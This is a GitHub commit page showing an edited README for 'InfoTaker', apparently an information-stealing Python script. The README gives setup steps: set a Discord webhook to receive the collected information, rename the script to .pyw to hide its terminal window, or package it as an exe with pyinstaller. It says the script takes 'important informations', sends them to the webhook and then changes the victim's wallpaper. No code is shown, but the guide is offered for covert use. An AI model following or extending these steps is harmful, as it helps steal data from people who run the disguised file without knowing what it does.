Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
Fedi6431 authored Aug 31, 2024
1 parent 78be09f commit 5ccfa40
Showing 1 changed file with 6 additions and 1 deletion.
7 changes: 6 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -3,29 +3,34 @@

## Installation guide

1) Download the repository
1) Download the repository:

You can do it with the git command: `git clone https://github.com/Fedi6431/InfoTaker.git`

or just by downloading the zip file.
![image](https://github.com/user-attachments/assets/4151c84b-87ef-46ab-9408-52e8201ea305)

2) Download requirements:

Open the terminal in the repository folder and type: `pip install -r requirements.txt`
![image](https://github.com/user-attachments/assets/639106ea-fe87-45de-b31c-3d0d618a648e)

3) Edit the file:

you need to edit the discord webhook and the wallpaper URL

! remember that the wallpaper URL must have the image file like https://example.com/example.png !
![image](https://github.com/user-attachments/assets/d4e68819-1c3c-4c1c-a4d0-0fd4b944f22b)

4) Rename the file:

Rename the file in whatever you want, a little tip, use the pyw extention to hide the terminal

or convert it from py to exe with pyinstaller or some other tool
![image](https://github.com/user-attachments/assets/8ecf7642-5d44-4f3f-ae28-917e90239c96)

5) Now the file is ready to use.

It will take important some informations and send them to the discord webhook typed,

after takeing informations it'll download and change the wallpaper.
Expand Down

0 comments on commit 5ccfa40

Please # to comment.